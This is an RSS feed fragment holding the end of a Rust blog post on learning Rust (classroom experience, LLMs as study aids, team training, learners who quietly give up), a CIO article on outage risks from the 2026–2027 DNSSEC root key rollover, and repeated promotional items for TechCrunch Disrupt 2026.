<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#teaching-rust-in-academia"></a>
Teaching Rust in academia</h3>
<p>We spoke with a university professor that's been teaching Rust generally. In the academic environment, they were able to use proxies for some things such as "traits are like interfaces in Java" because the students had already gone through a set of courses in their first and second years that taught them Java. They introduced concepts slowly throughout the course, choosing to deal with some more complex topics like generics later. The outcome generally was that students had no problem picking up Rust in this setting.</p>
<blockquote>
<p>"I couldn't see any big difference on the embedded side. We also teach an embedded class, and we did an experiment. Half of the students' feedback was worse on the Rust class, mostly because they needed to build the project themselves. The C students just got one from [an LLM], absolutely no problem." -- University Professor, on teaching Rust</p>
</blockquote>
<p>The C cohort leaned on LLMs for the project in ways the Rust cohort couldn't. We don't yet have a clear answer for why.</p>
<p>What did come through clearly was the Rust cohort's experience with the community. Some students needed to figure out which drivers to use for the embedded project and how to use them. Their professor encouraged them to open issues and ask questions directly on GitHub, and the maintainers responded. Students who had never contributed to open source before were getting answers from the people who wrote the code.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-using-llms"></a>
Learning using LLMs</h3>
<p>Some experienced folks shared that they saw LLMs as a tool that can help someone come up to speed quickly, either as a research tool or for generating example Rust code to understand concepts.</p>
<blockquote>
<p>"I'm optimistic that there's a way to work [LLMs] in that will cut down that learning curve. One of the big things these tools bring is reducing the learning curve in general; these are very good tools to help you navigate a space that you don't know yet." -- Maintainer of large open source Rust crate</p>
</blockquote>
<blockquote>
<p>"I try [LLMs] out once a month, usually for generating an example or something like this. Just like with Stack Overflow: when you read an example, you should read it carefully and try to understand it. Not copy and paste it, but type it in your own words in code and then check it, because that's where the teeny tiny little mistakes are." -- Founder of startup built on Rust</p>
</blockquote>
<p>For some learners, an LLM is just another way to find answers, no different than a search engine.</p>
<blockquote>
<p>"So for the most part, picking up Rust - how do I learn? I'll [use web search for] things, I'll ask [an LLM], I'll just poke around and read the code." -- Senior Software Engineer working in a regulated space</p>
</blockquote>
<p>One founder went further and claimed that LLMs change who can become a Rust developer. One consulting company founder described hiring high school graduates with no systems programming background and training them as Rust developers, with LLMs filling in the learning gaps that would previously have required years of experience.</p>
<blockquote>
<p>"At the beginning, I was worried, but now that we have [LLMs] supporting development, the difficulty of the language doesn't matter. I'm seeing a huge opportunity behind strong runtime languages like Rust. [..] In [Developing Country] we hire 20-25 high school graduates, train them to be Rust programmers, then they enhance our workforce worldwide." -- Founder of a consulting company</p>
</blockquote>
<p>We heard this from one organization. This is a claim that the combination of Rust's compiler and LLM tooling can dramatically shorten the path from beginner to working developer. Whether it generalizes depends on questions we can't answer from a single interview: how long these developers stay, what kind of code they can maintain independently, and whether this training/learning model works outside this company's particular structure. If it holds up, the pool of people who can become Rust developers is much larger than the usual hiring profile suggests.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#organizational-considerations-for-rust-learners"></a>
Organizational considerations for Rust learners</h3>
<p>We spoke with a number of folks on teams that are using Rust in larger organizations. Teams wanted to know that everyone would end up at roughly the same level of competence, which led a good number to invest in training courses to get there. Some leaders found that staff was able to ramp well enough by reading The Rust Programming Language, going through Rustlings, and then picking up lower risk and priority tickets to work on. Having a sense of community was also important within companies; it helps people know they are not alone when they are asked to work on Rust after, say, a reorganization happens.</p>
<blockquote>
<p>"[..] the idea with the class as opposed to 'just read the Rust book on your own' was that this gives everyone kind of the same baseline going in."  -- Principal Firmware Engineer (mobile robotics)</p>
</blockquote>
<blockquote>
<p>"So typically we're going to have people work through Rustlings, work through The Rust Programming Language. We have them then start to pick up lower risk tickets to work on." -- Principal Engineer at a large SaaS provider</p>
</blockquote>
<blockquote>
<p>"We've got an internal Slack channel for Rust learning where people can drop questions and others will come in and answer them. That helps build up understanding and community." -- Software Engineer at a large corporation</p>
</blockquote>
<p>Some organizations found that while the person they'd hire would need to learn Rust, it was still preferable to the alternative of hiring someone for a critical piece of software written in another language.</p>
<blockquote>
<p>"They needed to grow and maintain this C++ codebase. They had a C++ wizard, and they tried for about two years to find someone with the same level of expertise. They ended up hiring people that didn't know Rust and ramping them up, creating FFI bindings from the C++ side so they could work in Rust. And you can feel it: the borrow checker is teaching these people the right way to handle their systems." -- Principal Engineer at an Automotive OEM</p>
</blockquote>
<p>The community and helping each other aspect seems to grow bonds as organizations mature.</p>
<blockquote>
<p>"Our team is [all about] mentorship. I've mentored people coming up to speed on Rust, and people help each other hugely." -- Principal Software Engineer at a large SaaS company</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#silent-attrition"></a>
Silent attrition</h3>
<p>We identified some cases where people have approached Rust and bounced off of it, for one reason or another. In the below case, someone with a background in a language with fewer guardrails found themselves frustrated enough with Rust to walk away.</p>
<blockquote>
<p>"All of that means that that embedded ecosystem is very frustrating to somebody who comes from C and is like, why can't I just get a pointer to this peripheral and then write into the registers. What are you doing to me? [..] My friend never got over that. He looked at it and said, I'm not going to deal with this and walked away." -– A second University Professor</p>
</blockquote>
<p>There may be language features that for a particular domain are not seen as comfortable or usable yet, such as async Rust usage in a safety domain. We'd like to map which language features feel off-limits in which domains; async in safety-critical work probably isn't the only case.</p>
<blockquote>
<p>"We're not fully sure how async [Rust] will work out in the long run in our domain. [..] People don't feel comfortable yet since C++14 doesn't provide such concepts. [..] It's the chicken-and-egg problem again: we probably need to gain some experience to see whether we can actually benefit from these new concepts in the automotive and safety domains." -- Team Lead at Automotive Supplier (ASIL D target)</p>
</blockquote>
<p>We heard in at least one case, that while the language was challenging and there was a near bounce, the tooling helped keep them coming back and trying.</p>
<blockquote>
<p>"Well, I think my early impressions of Rust - one is I find C++ so intimidating, and I think a big part of why I was able to succeed at [..] learning Rust is the tooling. I mean, all this makes sense [..] but it's like, for me, getting started with Rust, the language was challenging, but the tooling was incredibly easy." -- Founder of another startup built on Rust</p>
</blockquote>
<p>While it might be considered more of a community concern, if there are interactions online and in spaces that point to learners having
so-called "skill issues" this feeds into the narrative that Rust must be hard to learn. We may be unintentionally turning away Rust Project contributors and maintainers due to the vibes being put out when new learners show up in certain spaces.</p>
<blockquote>
<p>"People are very helpful, but generally the attitude is: if your program is very complicated, it's mostly a skill issue. There's not that much empathy when people get stuck learning, and a lot of people are just pushed away by it. There's probably a huge number of people who silently stop wanting to write Rust, because at some point it gets complicated and the feedback they get is 'you just need to be a better programmer, obviously'." -- Software Engineer at a SaaS Provider</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#feedback-on-near-bounces-from-survey"></a>
Feedback on near-bounces from survey</h4>
<p>We found a few interesting perspectives collected in the Rust Vision doc survey which we administered with examples of bouncing and coming back:</p>
<blockquote>
<p>"I started before 1.0, got stuck very soon when trying to translate patterns from C++ to Rust (due to borrow checking). I tried again after 1.0 and it stuck. [..]" -- Survey Respondent A</p>
</blockquote>
<p>Survey Respondent A went on to share in a more detailed response about a perceived weakness in Rust learning materials related to lifetimes and the borrow checker are explained. There was an observation that it's fairly easy to run into more complex situations with lifetimes and the borrow checker. They felt that the current state of this sort of material and tutorials is fairly superficial and can leave learners stuck when they run into those more complex situations.</p>
<p>One respondent that bounced once and came back shared challenges around usage of async. In concert with Rust's memory-safety and the borrow checker, they found some of the nitty-gritty details of async were difficult to learn. While we're aware of the Rust Project's continuous efforts to improve Rust's async story, this is another data point of a user that faced challenges.</p>
<p>Another survey respondent shared how they had multiple times bounced in trying to learn Rust. They returned after a year or so and found Rustlings to be highly motivating. We note that having multiple pathways for folks to learn Rust opens up more possibilities for those that nearly bounced, just like this person.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#need-more-focused-work-on-silent-attritrion"></a>
Need more focused work on silent attritrion</h4>
<p>The thing that stood out most to us was the lack of real, first-hand knowledge of having bounced when learning Rust. While this is an obvious effect of soliciting answers to our survey and opportunities to interview through Rust channels and our networks, this cohort is good future candidate where interviews could start.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#conclusions"></a>
Conclusions</h3>
<p>Across these conversations, the experience of learning Rust depended heavily on context. Why someone was learning and what support they had mattered as much as the borrow checker. The same kinds of examples kept coming up: a training course that got a team to a shared baseline, a maintainer answering a student's first GitHub issue, and a colleague whose code showed that cloning was okay.</p>
<p>That context is largely something the community has a hand in. With that in mind, here is what we take away from what we heard, and what we still don't know.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#what-seems-worth-trying"></a>
What seems worth trying</h4>
<p><strong>Learning materials aimed at unlearning.</strong> Syntax barely came up when people described their struggles. People struggled with unlearning habits from previous languages, whether OOP structuring from C++ and Java or the instinct to grab a raw pointer to a peripheral. Most of our learning materials teach Rust from first principles, and that works. What we didn't come across is much written for, say, the engineer with ten years of Java who lands on a Rust team after a reorg: material that names the patterns they'll reach for that won't transfer, and shows what to do instead. The professor we spoke with did a version of this in the classroom, leaning on "traits are like interfaces in Java" and saving generics for later in the course, and the students did fine. Something similar could work outside the classroom too.</p>
<p><strong>Put the "clone freely while you're learning" advice somewhere official.</strong> Every experienced developer we spoke with gave the same advice, but learners seem to mostly pick it up by accident, like the researcher who happened to see someone else cloning the struct they had been carefully threading lifetimes through. Saying it early in official materials would take some of the steepness out of the curve. The broader version belongs there too: idiomatic Rust doesn't have to mean optimal Rust, especially on a first project.</p>
<p><strong>Diagnostics are already a primary learning resource: several people told us the compiler taught them lifetimes before any documentation did.</strong> Diagnostics reach learners right at the moment they're stuck. When writing new ones, it seems worth keeping the confused newcomer in mind alongside the expert, because for a lot of people this is where the learning happens.</p>
<p><strong>Is "the book" actually out of date?</strong> Whether or not The Rust Programming Language or other materials are actually behind, a team evaluating Rust looked at its repository, saw unresolved issues and unmerged PRs, and moved on. As more companies evaluate adoption, more people will look at these materials with the same fresh eyes. Visible issue triage and some communication about what's current and what's planned would address the perception, separately from whatever content work may or may not be needed.</p>
<p><strong>How stuck learners get treated is shaping who stays.</strong> We heard about students getting answers on GitHub from the maintainers who wrote the code, and we heard about learners being told their struggles were a skill issue. The first group came away with a lasting good impression of Rust. Some of the second group walked away entirely, and because they leave quietly, it's easy to underestimate how many of them there are. The welcoming side of the community came up unprompted as a reason people stayed, so we know it makes a difference when we get this right.</p>
<p><strong>Every organization we spoke with described essentially the same ramp-up for bringing a team to Rust.</strong> Teams that brought groups of developers to Rust described roughly the same approach: get everyone to a shared baseline with a training course or with The Rust Programming Language and Rustlings, start people on lower-risk tickets, and give them somewhere internal to ask questions. Several organizations also found that hiring developers without Rust experience and ramping them up worked out better than continuing to search for rare expertise in another language. None of this is complicated, and teams weighing adoption don't need to invent a training program from scratch.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#what-we-still-don-t-know"></a>
What we still don't know</h4>
<p>The biggest gap is the people we didn't reach. Nearly everyone we spoke with stuck with Rust long enough to be reachable through Rust channels, so the stories of bouncing off came to us second-hand: a friend who walked away from embedded Rust, colleagues who quietly stopped after the responses they got. As we wrote in <a href="https://blog.rust-lang.org/2025/12/03/lessons-learned-from-the-rust-vision-doc-process/" rel="external">our first post</a>, finding people who decided against Rust takes targeted outreach. If the proposed User Research team comes together, talking with learners who bounced would make a good early project, and learning is probably the area where that research would teach us the most.</p>
<p>We also don't know what to make of LLMs as a learning tool yet. They came up as a search engine, as an example generator, and in one organization's case as something that makes training high school graduates into working Rust developers possible. We saw a classroom where the C cohort leaned on LLMs in ways the Rust cohort couldn't, and we don't have an explanation for it. All of this comes from a handful of conversations, so we treat it as a set of leads to follow up on. Given how quickly the tools are changing, it seems better to study this deliberately than to wait and see what folklore develops.</p>
<p>The folks we spoke with showed that people do get there: with enough passes through the materials and enough code written, it eventually clicks. The opportunities above are mostly about making it work for the people who didn't pick Rust on purpose, and for the ones who would have stuck around if their early experience had gone a little differently.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs beware: DNS KSK rollover could kick off wave of mysterious outages]]></title>
<description><![CDATA[Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.



That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely...]]></description>
<link>https://tsecurity.de/de/3693085/it-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693085/it-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</guid>
<pubDate>Sat, 25 Jul 2026 06:16:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.</p>



<p class="wp-block-paragraph">That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely to deliver a series of seemingly unrelated system outages. This will come from oceans of dependencies from third-party, shadow, agentic, gen AI, SaaS, homegrown, and legacy apps — among many other quiet executable hiding spots, including virtual environments and containers.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/joshithak/">Sai Joshitha Kathari</a>, senior site reliability engineer at payment card giant Visa, says most enterprises have far more DNS-related exposure than they realize because of these many dependencies.</p>



<p class="wp-block-paragraph">“This has the potential to create real downstream destruction when unresolved failures sit underneath important business functions,” Kathari says. </p>



<p class="wp-block-paragraph">The danger is that so many of these issues are either unknown to IT or handled by a third-party vendor and no one in IT has had reason to ask those vendors about DNS updates. </p>



<p class="wp-block-paragraph">“The risky areas are usually not the obvious managed DNS services. They are the older internal applications, hardcoded resolvers, containerized workloads, sidecar configurations, custom scripts, partner integrations, VM images, stale base images, and service-to-service dependencies that nobody has touched in a long time,” Kathari explains. “These systems can keep working quietly for years, then fail during a DNS or certificate-related change because they bypassed the normal platform standards.”</p>



<p class="wp-block-paragraph">Independent technology analyst <a href="https://www.linkedin.com/in/carmi/">Carmi Levy</a> says that CIOs need to take this event very seriously. </p>



<p class="wp-block-paragraph">“The two-pronged deadline — October 11, 2026, when the new Key Signing Key (KSK) begins signing the root zone, and January 11, 2027, when the old key is retired — should be marked in red on everyone’s calendar, just as December 31, 1999, once was,” Levy says. “Failure to comply could result in websites, critical business applications, and related resources dropping off the face of the Earth once the transition is complete.”</p>



<p class="wp-block-paragraph">Levy adds: “Custom-built code that lives outside conventional support mechanisms may or may not function when the DNS changes go into effect.”</p>



<p class="wp-block-paragraph">The <a href="https://www.icann.org/resources/press-material/release-2026-05-20-en">DNSSEC update itself</a> is straightforward, but it is also the first significant DNSSEC change — specifically a change in the trust anchor — since 2018. </p>



<p class="wp-block-paragraph">The rollout statement noted that “the trust anchor is formally known as the Domain Name System Security Extensions (DNSSEC) root zone Key Signing Key (KSK). The KSK is the cryptographic key at the core of the DNSSEC trust anchor and is used to verify that DNS responses are legitimate and have not been modified in transit.”</p>



<h2 class="wp-block-heading">Expect nearly every enterprise to be impacted</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kimdavies/">Kim Davies</a>, vice president of IANA Services and president of public technical identifiers at ICANN, says the extent of the impact on enterprises is unknowable, given the nature of shadow IT and other edge cases. </p>



<p class="wp-block-paragraph">But based on the massive number of dependencies both known and unknown in the typical global enterprise, Davies guesses that just about every enterprise will be impacted, to varying degrees. </p>



<p class="wp-block-paragraph">“In highly complex organizations, it is very likely there will be some impact in the corners, in the margins, of the organization,” Davies tells CIO. “DNS is such a core technology that underpins everything.”</p>



<p class="wp-block-paragraph">As the updates propagate, hiccups will materialize, Davies notes. “When the system cannot validate the [DNS] information, it will treat it as suspect and DNS lookups will fail.”</p>



<p class="wp-block-paragraph">Visa’s Kathari says, “Enterprises should expect some secondary DNS-related glitches when major DNSSEC-related changes happen, not necessarily because the core infrastructure teams will ignore the update, but because large environments have many hidden dependency paths.”</p>



<p class="wp-block-paragraph">Making this problem far worse, Kathari notes, is that the glitches will likely initially look like anything other thana DNS glitch. That will force IT staff to waste a vast number of hours chasing causes that ultimately prove to be unrelated to the incidents. </p>



<p class="wp-block-paragraph">“The impact for CIOs is that DNS failures rarely announce themselves as DNS failures. They look like application timeouts, broken logins, failed API calls, queue lag, payment failures, partner connectivity issues, or random regional instability,” Kathari explains. “That makes troubleshooting slower because teams may spend hours looking at the application, database, network, or cloud provider before realizing name resolution is part of the failure path.”</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, agrees that IT will likely spin its wheels chasing the wrong ghosts.</p>



<p class="wp-block-paragraph">“A validation failure rarely stays in its lane. It surfaces as an application error, an API timeout, or a reachability problem, which turns a resolver fault into a coordination failure,” Gogia says. “The application team blames the network, the network team blames the cloud, and the user simply watches work stop.”</p>



<p class="wp-block-paragraph">“Images and templates are the frontier most teams miss,” Gogia adds. “A resolver fixed in summer can be broken again in October the instant a stale golden image is redeployed, because automation no longer lets configuration drift slowly. It restores yesterday’s assumptions at machine speed.”</p>



<p class="wp-block-paragraph">It is widely expected that enterprises will not have any problems executing the change or, more likely, relying on their hyperscalers to properly handle the change. That is the concern. </p>



<p class="wp-block-paragraph">“CIOs are being distracted so much with AI and this is such a deep in the weeds infrastructure issue that this can and willcatch people off-guard,” <a href="https://acceligence.com/talent/profiles/justin-greis/">Justin Greis</a>, CEO of consulting firm Acceligence, tells CIO. “I think we’ll see a meaningful number of enterprise disruptions associated with the DNSSEC trust anchor rollover. Not because the update itself is especially difficult, but because it will expose weaknesses that already exist inside many organizations.”</p>



<p class="wp-block-paragraph">Most enterprise IT operations have had no reason to compile a comprehensive list of all DNS dependencies, but many will be instantly discovered in January. </p>



<h2 class="wp-block-heading">Potentially widespread fallout</h2>



<p class="wp-block-paragraph">A major retailer, for example, might suddenly be unable to connect with FedEx to arrange for deliveries or a hospital may find that test results are no longer being shared with patient portals. It might manifest as an assembly line that halts because an IIoT component can no longer share files with its vendor system or a truck fleet that stops being tracked. </p>



<p class="wp-block-paragraph">“There will almost certainly be systems that fall through the cracks. Some will be legacy applications that rely on outdated DNS configurations that have not been updated in years,” Greis says. “Others will be business-unit-developed tools, contractor-built solutions, embedded systems, manufacturing and industrial systems, or highly customized workloads that operate outside normal IT oversight. These are the types of systems that often surface during infrastructure events like this.”</p>



<p class="wp-block-paragraph">Greis adds that many enterprises will discover in January problems created by their own automation.</p>



<p class="wp-block-paragraph">“Over time, enterprises build layers of processes, templates, and deployment mechanisms that are reused across teams and environments,” Greis notes. “Even after DNS infrastructure is updated correctly, older settings can inadvertently be reintroduced through routine updates and system changes, creating intermittent and difficult-to-diagnose failures.”</p>



<p class="wp-block-paragraph">The good news from this situation is that enterprises are not going to likely lose all DNS access if any of these glitches occur. But that may be of no comfort because even if the disruptions are only with small edge cases, that can still cause massive operational disruptions.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cricketliu/">Cricket Liu</a>, EVP and chief evangelist at Infoblox, gives the example of a DNS server that responds to factory-floor system queries.</p>



<p class="wp-block-paragraph">“Or let’s say this disrupts [an enterprise’s key] SaaS application. All name resolution may stop and it will show a server failure. It will not deliver a response whenever I look anything up. That’s not subtle at all,” Liu says. “It’s highly likely that companies are going to see some effects.”</p>



<p class="wp-block-paragraph">Back in 2017, the switchover was relatively uneventful, giving some CIOs hope that January 2027 will also be a non-event. But given the technology advancements in the last 10 years and the resulting tidal wave of new enterprise tech dependencies, few are realistically expecting no problems this go around. </p>



<h2 class="wp-block-heading">Impossible to predict what will happen</h2>



<p class="wp-block-paragraph">One of the top network experts on DNS effects in enterprises is <a href="https://blog.apnic.net/author/geoff-huston/">Geoff Huston</a>, chief scientist at the Asia Pacific Network Information Centre (APNIC), the regional Internet Registry administering IP addresses for the Asia Pacific region.</p>



<p class="wp-block-paragraph">Huston says it is difficult to project what will happen in January until it happens.</p>



<p class="wp-block-paragraph">“Just like the last time, we are flying blind with this key roll. Because nothing really terrible happened last time, there is some confidence that nothing terrible will happen this time, but we just can’t tell in advance as there are no good measurement approaches that allow us to peek inside the trust state of recursive resolvers,” he says.</p>



<p class="wp-block-paragraph">As for potential edge-case glitches, Huston says it is possible, but if third-party vendors do not properly handle the update, there will be other issues as well, as the KSK cryptographic key used within DNSSEC signs and validates the keys that protect DNS records. </p>



<p class="wp-block-paragraph">“If it is not standards-compliant, then you have more problems than just the KSK roll,” Huston says, “as it raises the obvious question of ‘What else is not correctly implemented in the DNS resolver that I’m running?’”</p>



<p class="wp-block-paragraph">As a silver lining, Acceligence’s Greis says any hiccups that result from the DNS KSK update may be a gift in disguise for CIOs. </p>



<p class="wp-block-paragraph">“The irony is that some of the most business-critical components in the technology stack are often the least visible because they work in the background,” Greis says. January “may reveal how much modern business resilience depends on infrastructure that many organizations rarely examine until something breaks. For CIOs, that’s the real lesson. This is not fundamentally a story about a DNS update. It is a story about operational visibility, resilience, and governance. Organizations that treat the rollover as a routine infrastructure task will likely complete the update and move on. Organizations that use it as an opportunity to understand and strengthen the foundations of their technology environment may gain far more value than simply avoiding an outage.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT leaders: Leading-edge AI insights await at TechCrunch Disrupt]]></title>
<description><![CDATA[For CIOs, learning from the startup ecosystem has never been more critical.



As pressure mounts to transform business operations with AI and agentic systems, IT leaders should be looking to those on the AI vanguard for insights into the strategic and technical decisions necessary to launch, gro...]]></description>
<link>https://tsecurity.de/de/3693066/it-nachrichten/it-leaders-leading-edge-ai-insights-await-at-techcrunch-disrupt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693066/it-nachrichten/it-leaders-leading-edge-ai-insights-await-at-techcrunch-disrupt/</guid>
<pubDate>Sat, 25 Jul 2026 05:51:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For CIOs, learning from the startup ecosystem has never been more critical.</p>



<p class="wp-block-paragraph">As pressure mounts to transform business operations with AI and agentic systems, IT leaders should be looking to those on the AI vanguard for insights into the strategic and technical decisions necessary to launch, grow, and thrive in today’s AI-disrupted business environment.</p>



<p class="wp-block-paragraph">So why not immerse yourself in Silicon Valley’s most famous firehose of hyper-accelerated fail-fast and dream-big culture by <a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">registering for TechCrunch Disrupt 2026</a>?</p>



<p class="wp-block-paragraph">Three packed days of 200-plus sessions across six stages will spark new ideas for reshaping your AI strategy, provide fresh perspectives on the architectural, workflow, and resource decisions involved in moving AI from pilots to scale, and give you a sneak peek of business disruptions to come.</p>



<p class="wp-block-paragraph"><strong><a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">Get 10% off your TechCrunch Disrupt</a> pass with the exclusive code CIO10.</strong> </p>



<p class="wp-block-paragraph">This year’s <a href="https://techcrunch.com/events/techcrunch-disrupt/">TechCrunch Disrupt</a>, held Oct. 13-15 at San Francisco’s Moscone West, will feature big-picture conversations on what’s next in AI; discussions on how AI agents are rewriting SaaS, enterprise workflows, software pricing, and security; and demonstrations of AI’s future across robotics, manufacturing, defense, and industrial operations; and more.</p>



<p class="wp-block-paragraph">Over 10,000 attendees will hear from 250-plus startup founders, technology executives, and enterprise IT leaders about how the future of programming is being rewritten, what enterprise AI security requires, how startups are orchestrating workloads across models while managing cost and reliability at scale, why creating a safety culture is essential for AI deployment, and how startups are deciding what work humans should own versus what should be delegated to AI as they work to build hybrid teams without losing speed, accountability, or culture.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p class="wp-block-paragraph">And of course, the rising tide of enterprise-focused startups will be there seeking to bring agentic systems to your business workflows, as well as vendors familiar to your enterprise IT portfolios, such as AWS, Google, and Databricks, and enterprise IT colleagues creating mutually beneficial partnerships with the startup community, such as American Express.</p>



<p class="wp-block-paragraph">That’s not to mention TechCrunch Disrupt’s signature <a href="https://techcrunch.com/startup-battlefield/">Startup Battlefield</a>, in which 200 standout companies showcase their innovations to compete for a $100K equity-free prize. The battlefield will give CIOs a rapid-fire, broad view of what’s possible — and a possible early look at the next big enterprise player. After all, Dropbox, Trello, and Cloudflare, among others, roamed that same battlefield before the world knew their names.</p>



<p class="wp-block-paragraph">And with M&amp;A now an early-stage startup strategy for many from day one, TechCrunch Disrupt’s exhibition floor provides IT leaders not just an opportunity to discuss the nuts and bolts of innovation architecture or how an upstart product can enhance your workflows, but a chance to find your next innovation partner, or more.</p>



<p class="wp-block-paragraph">Leading-edge startups are figuring out how to make AI work at scale. Shouldn’t you be?</p>



<p class="wp-block-paragraph"><strong>Don’t miss your chance to experience TechCrunch Disrupt 2026. <a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">Book your pass today and use the exclusive code CIO10</a> to save 10% before prices increase.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[TechCrunch Disrupt 2026’s new Smart Money Stage explores fintech, payments, AI, and everything between ]]></title>
<description><![CDATA[Money has evolved into far more than the cash in your wallet or your bank account. And at TechCrunch Disrupt 2026, we’re devoting an entire stage to that progression.]]></description>
<link>https://tsecurity.de/de/3692680/it-nachrichten/techcrunchdisrupt-2026s-new-smart-money-stage-explores-fintech-payments-ai-and-everything-between/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692680/it-nachrichten/techcrunchdisrupt-2026s-new-smart-money-stage-explores-fintech-payments-ai-and-everything-between/</guid>
<pubDate>Sat, 25 Jul 2026 00:18:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Money has evolved into far more than the cash in your wallet or your bank account. And at TechCrunch Disrupt 2026, we’re devoting an entire stage to that progression.]]></content:encoded>
</item>
<item>
<title><![CDATA[IT leaders: Leading-edge AI insights await at TechCrunch Disrupt]]></title>
<description><![CDATA[For CIOs, learning from the startup ecosystem has never been more critical.



As pressure mounts to transform business operations with AI and agentic systems, IT leaders should be looking to those on the AI vanguard for insights into the strategic and technical decisions necessary to launch, gro...]]></description>
<link>https://tsecurity.de/de/3692224/it-security-nachrichten/it-leaders-leading-edge-ai-insights-await-at-techcrunch-disrupt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692224/it-security-nachrichten/it-leaders-leading-edge-ai-insights-await-at-techcrunch-disrupt/</guid>
<pubDate>Fri, 24 Jul 2026 19:56:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For CIOs, learning from the startup ecosystem has never been more critical.</p>



<p class="wp-block-paragraph">As pressure mounts to transform business operations with AI and agentic systems, IT leaders should be looking to those on the AI vanguard for insights into the strategic and technical decisions necessary to launch, grow, and thrive in today’s AI-disrupted business environment.</p>



<p class="wp-block-paragraph">So why not immerse yourself in Silicon Valley’s most famous firehose of hyper-accelerated fail-fast and dream-big culture by <a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">registering for TechCrunch Disrupt 2026</a>?</p>



<p class="wp-block-paragraph">Three packed days of 200-plus sessions across six stages will spark new ideas for reshaping your AI strategy, provide fresh perspectives on the architectural, workflow, and resource decisions involved in moving AI from pilots to scale, and give you a sneak peek of business disruptions to come.</p>



<p class="wp-block-paragraph"><strong><a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">Get 10% off your TechCrunch Disrupt</a> pass with the exclusive code CIO10.</strong> </p>



<p class="wp-block-paragraph">This year’s <a href="https://techcrunch.com/events/techcrunch-disrupt/">TechCrunch Disrupt</a>, held Oct. 13-15 at San Francisco’s Moscone West, will feature big-picture conversations on what’s next in AI; discussions on how AI agents are rewriting SaaS, enterprise workflows, software pricing, and security; and demonstrations of AI’s future across robotics, manufacturing, defense, and industrial operations; and more.</p>



